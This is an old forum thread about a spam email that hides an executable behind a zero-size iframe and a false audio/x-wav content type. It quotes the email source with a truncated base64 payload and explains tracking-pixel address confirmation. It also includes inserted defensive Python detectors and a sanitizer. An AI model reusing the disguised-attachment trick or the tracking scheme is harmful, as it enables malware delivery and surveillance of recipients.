Caught a virus/worm?

Stefan Jaeger

Hi,

I am searching for some advice.

I am using Netscape 7.0 as mail client.

Today I received a spam email, which I unfortunately read.

No attachment was indicated, so I haven't consciously executed
one.

But the mail's source code shows an attachment, linked with some
embedded HTML code contained in the email, like this:

-----------
From: inet email service <[email protected]>
Subject:
To: net user <[email protected]>
Message-id: <[email protected]>
MIME-version: 1.0
Content-type: multipart/alternative;
boundary="Boundary_(ID_wpznqumvvXFjV2jODCZM1w)"


--Boundary_(ID_wpznqumvvXFjV2jODCZM1w)
Content-type: text/html
Content-transfer-encoding: 7BIT

<HTML>
<HEAD></HEAD>
<BODY>
<iframe src="cid:zslobikmvfr" height=0 width=0></iframe>
<BR><BR><BR>Undeliverable to <B>[email protected]</B>
<BR><BR><BR>Message follows:<BR><BR><BR><BR>
</BODY></HTML>

--Boundary_(ID_wpznqumvvXFjV2jODCZM1w)
Content-id: <zslobikmvfr>
Content-type: audio/x-wav; name=cvafsxci.exe
Content-transfer-encoding: base64
Content-disposition: attachment; filename=cvafsxci.exe

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAB+i6hSOurGATrqxgE66sYBQfbKATvqxgG59sgBLerGAdL1zAEA6sYBWPXV
ASvqxgE66scBnurGAdL1zQEx6sYBguzAATvqxgFSaWNoOurGAQAAAAAAAAAAUEUAAEwBBABwy2E/
AAAAAAAAAADgAA8BCwEGAADQAAAAQAEAAAAAAIWuAAAAEAAAAOAAAAAAQAAAEAAAABAAAAQAAAAA....
-------------

Up to now nothing has happened; the updated virus scanner didn't find anything,
but I haven't restarted the machine yet :).

Anyone who could identify that mechanism?

Does Netscape execute that HTML iframe order?

Thx

Stefan
 
FromTheRafters

Stefan Jaeger said:
Hi,

I am searching for some advice.

I am using Netscape 7.0 as mail client.

Today I received a spam email, which I unfortunately read.

No attachment was indicated, so I haven't consciously executed
one.

But the mail's source code shows an attachment, linked with some
embedded HTML code contained in the email, like this:
[snip]

<iframe src="cid:zslobikmvfr" height=0 width=0></iframe>
[snip]

Content-id: <zslobikmvfr>
Content-type: audio/x-wav; name=cvafsxci.exe
Content-transfer-encoding: base64
Content-disposition: attachment; filename=cvafsxci.exe
[snip]

Up to now nothing has happened; the updated virus scanner didn't find anything,
but I haven't restarted the machine yet :).

Anyone who could identify that mechanism?

"Incorrect MIME type exploit" (many incorrectly call it the "iframe exploit")
Does Netscape execute that HTML iframe order?

IFrame, yes. Exploit, no.....so malware, no.
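As an added illustration of the mechanism FromTheRafters names (this is not code from anyone in the thread), the following Python rebuilds the quoted message as a constructed sample and flags the two tricks in it: the `audio/x-wav` part whose file name and first bytes say "Windows executable", and the zero-size iframe that references that part through its Content-ID. The rule names and the executable-extension list are my own choices, and the base64 body is cut to its first line.

```python
import email
import re
from email import policy

# Constructed sample modelled on the message quoted in the thread; the base64
# body is cut to its first line (the "MZ" header of a DOS/Windows executable).
SAMPLE = """\
Content-type: multipart/alternative;
 boundary="Boundary_(ID_wpznqumvvXFjV2jODCZM1w)"

--Boundary_(ID_wpznqumvvXFjV2jODCZM1w)
Content-type: text/html

<HTML><BODY><iframe src="cid:zslobikmvfr" height=0 width=0></iframe></BODY></HTML>
--Boundary_(ID_wpznqumvvXFjV2jODCZM1w)
Content-id: <zslobikmvfr>
Content-type: audio/x-wav; name=cvafsxci.exe
Content-transfer-encoding: base64

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
--Boundary_(ID_wpznqumvvXFjV2jODCZM1w)--
"""

EXEC_EXTS = {"exe", "scr", "pif", "com", "bat", "cmd"}   # my own list
IFRAME_CID = re.compile(r'<iframe[^>]*\bsrc=["\']?cid:([^"\'\s>]+)', re.I)

def analyse(raw):
    """Return (rule, detail) findings for the MIME tricks the thread describes."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings, iframe_refs, exec_parts = [], set(), {}
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        fname = part.get_filename() or ""
        cid = str(part.get("Content-ID", "")).strip("<>")
        body = part.get_payload(decode=True) or b""
        # Rule 1: executable name or "MZ" magic hidden under a media Content-Type.
        if fname.rsplit(".", 1)[-1].lower() in EXEC_EXTS or body[:2] == b"MZ":
            exec_parts[cid] = fname
            if not ctype.startswith("application/"):
                findings.append(("type-mismatch", f"{fname} declared as {ctype}"))
        # Rule 2: HTML that pulls another MIME part in through an iframe.
        if ctype == "text/html":
            refs = IFRAME_CID.findall(body.decode("latin-1"))
            iframe_refs.update(refs)
            findings.extend(("iframe-cid", r) for r in refs)
    # Rule 3: the iframe target is the mis-typed executable part itself.
    for ref in sorted(iframe_refs & set(exec_parts)):
        findings.append(("iframe-to-executable", f"cid:{ref} -> {exec_parts[ref]}"))
    return findings
```

Running `analyse(SAMPLE)` yields the three findings; a client that trusts the declared type rather than the content would treat the part as audio, which is exactly the mismatch the first rule catches.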
 
Jafar

Stefan said:
Does netscape execute that html iframe-order?

As far as I know NS won't execute the .exe. One way to be sure about things
is to disable .html mails in NS itself. This will also stop spammers from
embedding invisible graphics files which report back that your email address
is valid.

Jafar
 
Stefan Jaeger

Jafar said:
As far as I know NS won't execute the .exe. One way to be sure about things
is to disable .html mails in NS itself. This will also stop spammers from
embedding invisible graphics files which report back that your email address
is valid.

Jafar

Done.

Thank you, Jafar and thank you, FromTheRafters.

Stefan
 
charles

As far as I know NS won't execute the .exe. One way to be sure about things
is to disable .html mails in NS itself. This will also stop spammers from
embedding invisible graphics files which report back that your email address
is valid.

Would you elaborate on the above please. How do the embedded graphics
report back address info? I just don't understand how that would be
done.

Thanks for the info.
 
Jafar

charles said:
Would you elaborate on the above please. How do the embedded graphics
report back address info? I just don't understand how that would be
done.

Thanks for the info.

I'm not sure of the specifics, but some HTML emails can contain a transparent
graphic that downloads from a server and reports back that the email
address is valid, as the email has been opened. Don't ask me exactly how, as
I'm not a coder. Well, not since the good old days of the C64 ;)

Jafar
 
Rick

Would you elaborate on the above please. How do the embedded graphics
report back address info? I just don't understand how that would be
done.

It's pretty simple. The image is embedded into the HTML email with a
unique URL. Ever seen a URL that looks like
"http://xyz.com/image.jpg?R3aaC6"? The key is in the random-appearing
letters after the ? embedded within the URL. That URL will resolve to
the "image.jpg" file regardless of those random characters, but those
random characters will be read and stored by the server that is
serving that image.jpg file.

The spammer simply builds a database of email addresses and includes a
field that contains a unique series of random-appearing characters (a
simple six-character string using upper/lower case letters and numbers
provides over 56 billion unique strings). They can then send out spam to
each address in the database and "mark" the URL to the image file with
that email address's unique identifier. Whenever a recipient opens that
email and views that image file, the file is requested from the server
that is hosting it. That request will include the unique identifier, which
can in turn be harvested easily from the server logs.
 
charles

It's pretty simple. The image is embedded into the HTML email with a
unique URL. Ever seen a URL that looks like
"http://xyz.com/image.jpg?R3aaC6"? The key is in the random-appearing
letters after the ? embedded within the URL. That URL will resolve to
the "image.jpg" file regardless of those random characters, but those
random characters will be read and stored by the server that is
serving that image.jpg file.

The spammer simply builds a database of email addresses and includes a
field that contains a unique series of random-appearing characters (a
simple six-character string using upper/lower case letters and numbers
provides over 56 billion unique strings). They can then send out spam to
each address in the database and "mark" the URL to the image file with
that email address's unique identifier. Whenever a recipient opens that
email and views that image file, the file is requested from the server
that is hosting it. That request will include the unique identifier, which
can in turn be harvested easily from the server logs.

Thanks for the info. I knew that the links in these emails contained
identifiers but I never realized that the render itself would flag the
receipt.

Though I mostly use just text, I've gotten used to more and more stuff
that comes through conveniently in HTML. I'll have to figure out some
alternative to just disabling it completely.
 
Barry

charles said:
Thanks for the info. I knew that the links in these emails contained
identifiers but I never realized that the render itself would flag the
receipt.

Though I mostly use just text, I've gotten used to more and more stuff
that comes through conveniently in HTML. I'll have to figure out some
alternative to just disabling it completely.

The e-mail program Pegasus which is a freebie, flags up messages which
have 'lazy HTML' in them instead of just displaying them. I think it is
a super program even if it does look a little dated.
 
Rick

The e-mail program Pegasus which is a freebie, flags up messages which
have 'lazy HTML' in them instead of just displaying them. I think it
is a super program even if it does look a little dated.

For the last couple of years I've been using Poco which has three
buttons at the top of the preview pane (and child window if emails are
opened that way) for dealing with that sort of stuff. One of them
specifically turns on/off image downloading. A second button "sanitizes"
the email to block all HTML calls to any object(s) (images,
CSS/javascript files, embedded objects, etc.) which is/are not included
inside of the email itself. It leaves the text and basic HTML formatting
intact as long as it is included within the email itself (instead of in
an external CSS file). The third button strips all HTML from the email
and displays straight text only.

I generally just leave the "sanitize" button turned on and block all
externally referenced objects (including images). If the email is from a
trusted source, it's a simple matter to click on the button and display
the email as its sender intended. If it's not from a trusted source then
it's far more likely to be tossed in the trash than anything else. I'm
busy enough as it is without wanting to delve into any of this
unsolicited crap that pours in.
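Rick's explanation of tracking tokens and his description of Poco's "sanitize" button can be shown together. The following Python is an added example (not Poco's code, and not from anyone in this thread) that strips remote fetches from a constructed HTML mail body while leaving `cid:` inline content and ordinary links alone, and reports each blocked URL together with its query-string token. The tag/attribute table is my own assumption about what a client fetches while rendering.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed HTML mail body (not from the thread): one inline image carried in
# the message itself, one 1x1 remote image whose query string is the per-recipient
# token Rick describes, a remote stylesheet, and an ordinary link.
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" href="http://xyz.com/mail.css">
</head><body>
<p>Hello!</p>
<img src="cid:logo01" alt="logo">
<img src="http://xyz.com/image.jpg?R3aaC6" width=1 height=1>
<a href="http://xyz.com/offer?R3aaC6">offer</a>
</body></html>"""

# Attributes a mail client fetches while merely rendering the message (my own
# list). <a href> is deliberately absent: a link only fires when clicked.
FETCH_ATTRS = {"img": "src", "iframe": "src", "script": "src", "link": "href",
               "object": "data", "embed": "src", "source": "src"}
ATTR_VALUE = r"""\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)"""

class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__()
        self.blocked = []    # (tag, url, query string) for the report
        self.rewrites = []   # (original tag text, neutralised tag text)

    def handle_starttag(self, tag, attrs):
        attr = FETCH_ATTRS.get(tag)
        if attr is None:
            return
        url = dict(attrs).get(attr) or ""
        if not url or urlsplit(url).scheme.lower() in ("cid", "data"):
            return  # content shipped inside the mail itself: keep it
        self.blocked.append((tag, url, urlsplit(url).query))
        raw = self.get_starttag_text()
        # Drop only the fetching attribute so the surrounding layout survives.
        new = re.sub(r"\s" + re.escape(attr) + ATTR_VALUE, "", raw, count=1, flags=re.I)
        self.rewrites.append((raw, new))

def sanitize(html):
    """Return (sanitised html, list of blocked remote references)."""
    p = Sanitizer()
    p.feed(html)
    p.close()
    for raw, new in p.rewrites:
        html = html.replace(raw, new, 1)
    return html, p.blocked
```

The report shows why opening the mail is enough to "flag the receipt": the token `R3aaC6` travels in the image request, whereas the identical token in the link only leaves the machine if the reader clicks it.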
 
charles

<snip>

I've used the Mozilla email client for a long time and have been pretty
satisfied with it. I notice that in one of the extensions for it,
MozTweak, there are options to render html optionally using
blacklist/whitelists.

That seems a reasonable way to go. I don't know how to set it up but
will look into and post if I find anything useful.
 